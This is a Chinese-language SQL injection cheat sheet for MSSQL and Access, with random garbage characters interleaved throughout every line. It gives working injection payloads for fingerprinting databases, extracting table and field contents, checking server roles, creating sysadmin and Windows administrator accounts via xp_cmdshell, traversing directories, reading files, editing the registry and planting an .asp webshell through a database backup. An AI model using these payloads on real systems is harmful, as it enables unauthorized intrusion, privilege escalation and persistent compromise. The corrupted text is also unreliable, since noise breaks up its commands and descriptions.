1.判断是否有注入;and 1=1 ;and 1=2 H�l*��v�S
2.初步判断是否是mssql ;and user>0 :�t��?B)
}r}*=�;�Ea
3.注入参数是字符'and [查询条件] and ''=' �ZW��s����
V35Vi6�*p
4.搜索时没过滤参数的'and [查询条件] and '%25'=' &H(yL�d��[
jU�,Xlgz(A
5.判断数据库系统 OLw]BJXYaE
�B�ou�s �d
;and (select count(*) from sysobjects)>0 mssql i1iP'`��r�
-�@To<�<`n
;and (select count(*) from msysobjects)>0 access *4,�Q9K�_�
_ �_�O�f0<
1/_g36�\l$
?H{[�u rLn
6.猜数据库 ;and (select Count(*) from [数据库名])>0 N(��/�)��e
[m~�J�6W�B
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 .6?"�<zdPU
�igO>)XbsM
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �MDMd$]�CW
Lx"�GBEkt7
9.(1)猜字段的ascii值(access) q*!R4yE;�C
�6��Z\��aJ
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 '�o$�j�~Mr
Z:4/lx7Bq
(2)猜字段的ascii值(mssql)
�J~~\0 �u
b� UG,~\�Z
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �^$c#L1
�C
�|�O��Q�]F
10.测试权限结构(mssql) ?�HEqv$�n
T�^bA�O-d#
CK* *���RZ
�fv+]�iK<{
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- PK\�Z���Rl
n.��%QWhUB
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ��>KKW�hJ�
a[�{$�4JpK
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �3i�^X9[�.
7�vR�t�T�P
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �b�z�N[*X|
/\�J�0�)�V
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- @��!C�hP�l
c-Gp�|�.C�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- -H|�
9�82=
.qB��c�;�u
;and 1=(select IS_MEMBER('db_owner'));-- K7}.#�*% ~
<'Q6\R}:vC
�8��NN�+Z<
]ua3I}_B6v
11.添加mssql和系统的帐户 hA=�u�oe\
&Ai�Ad���6
;exec master.dbo.sp_addlogin username;-- 1\hLwG�6Jj
;exec master.dbo.sp_password null,username,password;-- (m]l -Re
[�"Zvwes#7
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- G|�i0n
��
\S}/2�]* 1
;exec master.dbo.xp_cmdshell 'net user username password zAgX{$�/Fg
�R >x�d�*A
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- Y;'�<u\^M"
D
�0Xl`0"'
;exec master.dbo.xp_cmdshell 'net user username password /add';-- (
eV��,�f�
*&U~Io�"U�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �[6GYYu\��
>hun�V'vu'
%9-�^�,og�
D�(b01EQ;d
12.(1)遍历目录 fk*(8�@�u>
-L2.�c�N_�
;create table dirs(paths varchar(100), id int) !Ko2yn}6l�
3(Yv�qPp&�
;insert dirs exec master.dbo.xp_dirtree 'c:\' �Hv6��h7�-
��)���f?I{
;and (select top 1 paths from dirs)>0 ���.�7iRV�
�i_qY=*a?y
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) v^"�\�e&XL
E�@VQ�xB7+
��/�t�5�)&
J[/WBV�FDf
(2)遍历目录 ax@H^Gj@2
z}� f�pV T
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- >oh��Cz@~�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 41�
F;X{Br
y�
oW��~�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 .?�}M(�mL�
x&B&lFmo�8
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �}#z1�>y!#
?v^N�i�mcZ
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 dx%z9[8~{.
4o�>�y9�
*l5?_��t�F
#�W�\}v(Ke
13.mssql中的存储过程 8�Vu@awz{L
Okq,��p=D6
xp_regenumvalues 注册表根键, 子键 ��2D 4�,#X
fA��=Z):�w
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 -()�WT�dIy
dT|�Xc�VKg
xp_regread 根键,子键,键值名 J�8�i;E�4R
vQWm�Hv\P
;exec xp_regread _i_='dsyW/
C�qd\n#d/~
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 @�9�/I^Zk
PV68d; $:8
xp_regwrite 根键,子键, 值名, 值类型, 值 .}�faWzRH9
b�{0a/&&1O
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 P&`%VW�3E�
N'{[�BA(eE
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �Ej�ug2�q�
x*OdMr\n8?
xp_regdeletevalue 根键,子键,值名 E�q�-+g�1a
<'��:h/�d
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 oR#W@OK@is
u�q�5?��t
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 U�>t�R�:�)
�$;v!� �,>
�s`�yzeo��
�w8lrpbLh
14.mssql的backup创建webshell ��zx@!�8Z
�ly�[�yn�{
use model r�]9��-~1T
�W�NR]GI�
create table cmd(str image); vF\>;�p�cT
O_QDjxj^rZ
insert into cmd(str) values (''); ��
: (UK'i
uFr12ZFg�K
backup database model to disk='c:\l.asp'; 0�/HFLz'��
�Q,?_;,I}
�/@:X0�}L�
��>n7h%c��
15.mssql内置函数 P�2n�8H�Fi
cS�L�6�V2F
;and (select @@version)>0 获得Windows的版本号 _k:8ib�2TQ
!�}Xoqamm
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �S�n�r�(<u
0zW*JJxV
;and (select user_name())>0 爆当前系统的连接用户 |5u��~L#�P
FjC�GD4x1N
;and (select db_name())>0 得到当前连接的数据库 rLTB�B�v�V
k�>&cHCS`*
=�.`\�V�]�
���o z*;q]
16.简洁的webshell RV~�t%Sw^�
aM5]c���c%
use model �?/|�X��ie
��@$
7 GrT
create table cmd(str image); @=kg�K[t
9
�`v��-[&��
insert into cmd(str) values (''); ~'M<S���=W
21TR_0g&�<
backup database model to disk='g:\wwwtest\l.asp';
